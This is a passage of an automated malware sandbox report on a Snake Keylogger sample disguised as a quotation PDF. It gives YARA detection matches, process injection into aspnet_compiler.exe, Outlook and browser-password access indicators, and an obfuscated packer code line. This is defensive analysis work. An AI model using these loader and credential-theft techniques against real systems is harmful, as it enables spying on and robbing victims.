Source: 4.2.aspnet_compiler.exe.2c62ad300e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.aspnet_compiler.exe.2c62ad300e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.aspnet_compiler.exe.2c62ad300e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000004.00000002.2950604363.000002C61AB20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000004.00000002.2950604363.000002C61AB20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000004.00000002.2950604363.000002C61AB20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000004.00000002.2950604363.000002C61AB20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.2328766008.000002C7B801D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000004.00000002.2949416019.000002C619020000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.2316760953.000002C7A79E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000004.00000002.2953399954.000002C62AD29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000004.00000002.2953399954.000002C62AD29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: aspnet_compiler.exe PID: 6012, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: aspnet_compiler.exe PID: 6012, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, PrinterProcessResolver.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7b79d6938.7.raw.unpack, qFHbx242VP7CG5hqXEm.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7b79d6938.7.raw.unpack, qFHbx242VP7CG5hqXEm.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7b79d6938.7.raw.unpack, qFHbx242VP7CG5hqXEm.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7b79d6938.7.raw.unpack, qFHbx242VP7CG5hqXEm.cs	Cryptographic APIs: 'CreateDecryptor'

Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, TaskIdentifierItem.cs	Task registration methods: 'RegisterComposer', 'CreateVisitor', 'CreatePrinter'
Source: 0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7b7f569a8.2.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7b7f569a8.2.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7b7f569a8.2.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7b7f569a8.2.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'

Source: 0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7b7f569a8.2.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7b7f569a8.2.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7b7f569a8.2.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7b7f569a8.2.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7b7f569a8.2.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7b7f569a8.2.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/0@4/2

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3980:120:WilError_03

Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61B000000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AFF0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61B00E000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe

ReversingLabs: Detection: 18%

Source: unknown	Process created: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe "C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe"
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: uxtheme.dll	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7F2E000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7FA6000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2316760953.000002C7A78FB000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2336208720.000002C7C02D0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7F2E000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7FA6000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2316760953.000002C7A78FB000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2336208720.000002C7C02D0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2335828598.000002C7C0080000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7BE9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7DCB000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2335828598.000002C7C0080000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7BE9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7DCB000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7b79d6938.7.raw.unpack, qFHbx242VP7CG5hqXEm.cs

.Net Code: Type.GetTypeFromHandle(iBCq9Uo05mtTNBBh2iI.k8tG5N3Dyp(16777347)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(iBCq9Uo05mtTNBBh2iI.k8tG5N3Dyp(16777252)),Type.GetTypeFromHandle(iBCq9Uo05mtTNBBh2iI.k8tG5N3Dyp(16777284))})

.NET source code contains potential unpacker

Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, MapperAttributeDispatcher.cs	.Net Code: ReflectPage System.Reflection.Assembly.Load(byte[])
Source: 0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7b7d7bdf8.9.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7b7d7bdf8.9.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7b7d7bdf8.9.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7b7d7bdf8.9.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7b7d7bdf8.9.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7b7f569a8.2.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7b7f569a8.2.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7b7f569a8.2.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7b7dcbe30.5.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7b7dcbe30.5.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7b7dcbe30.5.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7b7dcbe30.5.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7b7dcbe30.5.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7c0000000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7b7cddb88.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2335523965.000002C7C0000000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2328766008.000002C7B7BE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2316760953.000002C7A779B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe PID: 3244, type: MEMORYSTR

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_00007FFD9B8048FA push eax; retf		0_2_00007FFD9B804969
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_00007FFD9B803D78 push E95D3B67h; ret		0_2_00007FFD9B803D99

